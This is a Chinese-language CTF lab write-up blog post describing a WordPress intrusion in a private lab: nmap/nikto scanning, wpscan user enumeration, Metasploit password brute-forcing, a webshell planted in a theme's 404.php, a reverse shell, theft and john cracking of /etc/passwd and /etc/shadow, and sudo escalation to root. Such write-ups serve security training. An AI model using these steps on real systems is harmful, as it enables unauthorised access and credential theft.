CTF-14.web安全暴力破解

暴力破解漏洞介绍

穷举法的基本思想是根据题目的部分条件确定答案的大致范围,并在此范围内对所有可能的情况逐一验证,直到全部情况验证完毕。若某个情况验证符合题目的全部条件,则为本问题的一个解;若全部情况验证后都不符合题目的全部条件,则本题无解。穷举法也称为枚举法。

Web安全中的暴力破解也是利用尝试所有的可能性最终获取正确的结果。

实验环境

攻击机: kali linux192.168.253.12
靶场机器: ubuntu linux 192.168.253.20

信息探测

扫描主机服务信息以及服务版本
–nmap -sV 靶场IP地址在这里插入图片描述

快速扫描主机全部信息
–nmap -T4 -A -v 靶场IP地址

探测敏感信息
– nikto -host http://靶场IP地址:端口

在这里插入图片描述

分析nmap ,nikto扫描结果,并对结果进行分析,挖掘可以利用的信息; 发现/secret是一个比较敏感的信息
使用浏览器打开http://ip:port/敏感页面,查看敏感信息,找到可利用的位置;
在这里插入图片描述
点击这个箭头后,界面如下所示:
在这里插入图片描述
在点击log in

在这里插入图片描述
在这里插入图片描述
或者,可以在kali中编辑 /etc/hosts
在这里插入图片描述

暴力破解

使用wpscan进行用户名提取
在这里插入图片描述
需要修改ur1
在这里插入图片描述
获取到用户名
在这里插入图片描述

启动Metasploit -> msfconsole

msf > use auxiliary/scanner/http/wordpress_login_enummsf auxiliary(wordpress_login_enum) > set username admin
msf auxiliary(wordpress_login_enum) > set pass_file /usr/share/wordlists/clirb/common.txt
msf auxiliary(wordpress_login_enum) > set targeturi /secret/
msf auxiliary(wordpress_login_enum) > set rhosts 192.168.1.13
msf auxiliary(wordpress_login_enum) > run

使用破解好的密码登录系统
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

登上之后进入后台,上传webshell获取控制权

在这里插入图片描述
wordpress后台寻找上传点
–fwentyteeth的404.php 可以上传webshell
在这里插入图片描述
启动监听
在这里插入图片描述

执行shell,获取反弹shell。

http://靶场IP/wordpress/wp-content/ themes/twentyfourteen/404.php

查看系统信息sysinfo
查看用户权限id

root权限

Metasploit中利用返回shell 下载download /etc/passwd download /etc/ shadow
在这里插入图片描述

–将文件转换为join可以识别的文件格式
unshadow passwd shadow > cracked

–使用john破解密码
john cracked
在这里插入图片描述

su - marlinspike
sudo -l
sudo bash
在这里插入图片描述

获取Flag

一般情况下,靶场机器的flag值是存放在服务器的根目录下,/root/目录。
cd /root/
ls
cat flag

在这里插入图片描述

Writeup测试文档总结文档

总结

提权时可以抓取/etc/passwd和/etc/shadow,之后使用join来破解对应的密码,然后使用对应的用户名密码提升root权限;

对于wp的渗透中,启动对应的主题,然后在404页面上传shell ;

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

wow2ok

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值